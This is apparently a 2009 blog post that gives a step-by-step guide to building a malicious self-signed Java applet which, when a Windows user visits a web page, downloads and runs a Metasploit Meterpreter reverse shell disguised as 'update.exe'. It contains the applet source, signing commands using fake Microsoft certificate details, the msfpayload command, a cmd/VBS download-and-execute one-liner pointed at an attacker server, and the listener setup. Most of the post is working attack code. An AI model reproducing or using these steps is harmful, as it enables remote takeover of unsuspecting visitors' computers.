Building a Java Applet with Meterpreter Payload

July 3, 2009

At Infosec World Conference, I gave a presentation on Breaking the Browser with Rafal Los. One of the demos that I prepared was a Java Applet with a Meterpreter Payload. The demo can be found here.

In this post, we will build an Applet that executes cmd.exe. Here is the source code of the Applet:

import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String cmd = "cmd.exe";
try {
f = Runtime.getRuntime().exec(cmd);
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}

Next, we need to self-sign the applet so that it can be run with access within the browser.

Compile the Applet source code to an executable class.
javac MSFcmd.java
Package the compiled class into a JAR file.
jar cvf MSFcmd.jar MSFcmd.class
Generate key pairs.
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass

Sign the JAR file.
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet

Export the public key certificate.
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer

To make this easier for people to use,I built a simple bash script called makeapplet.sh.

Example of running makeapplet.sh:
./makeapplet.sh
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name?
[Unknown]:
What is the name of your organizational unit?
[Unknown]:
Microsoft
What is the name of your organization?
[Unknown]:
Microsoft Organization
What is the name of your City or Locality?
[Unknown]:
Redmond
What is the name of your State or Province?
[Unknown]:
Seatle
What is the two-letter country code for this unit?
[Unknown]:
US
Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct?
[no]:
yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

Finally, we just need to deploy the JAR and the class file.
cp SignedMSFcmd.jar /var/www/
cp MSFcmd.class /var/www/
echo “<applet code=”MSFcmd.class” archive=”SignedMSFcmd.jar”
height=”1″ width=”1″></applet>” > /var/www/index.html
sudo /etc/init.d/apache2 start
Browse to the webserver from a windows system, which will execute cmd.exe

To have the applet provide us a meterpreter reverse shell we need to modify the command that is run. First we need to construct a malicious executable using Metasploit:

The executable can be constructed by:
(replace x.x.x.x with the ip of your server)

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R
| ./msfencode -t exe -o update.exe;
cp update.exe /var/www/
sudo chmod 755 /var/www/update.exe

Now, we need to add a command into the Java Applet to download and execute the executable:
cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://x.x.x.x/my.exe C:\windows\update.exe
(replace x.x.x.x with the ip of your server)

Reference: http://www.milw0rm.com/papers/262

Setup Metasploit to listen for the connections:
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
save
exploit -j


[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler…
PWN dem V0hns!

Regards,
Jabra


MS09-002 Exploit via BeEF

June 27, 2009

Metasploit Adobe UtilPrintf Exploit

June 24, 2009

Firefox Keylogger

June 24, 2009

Metasploit XML Corruption Exploit

June 24, 2009

Clickjacking

June 24, 2009

BeEF on BackTrack4

June 24, 2009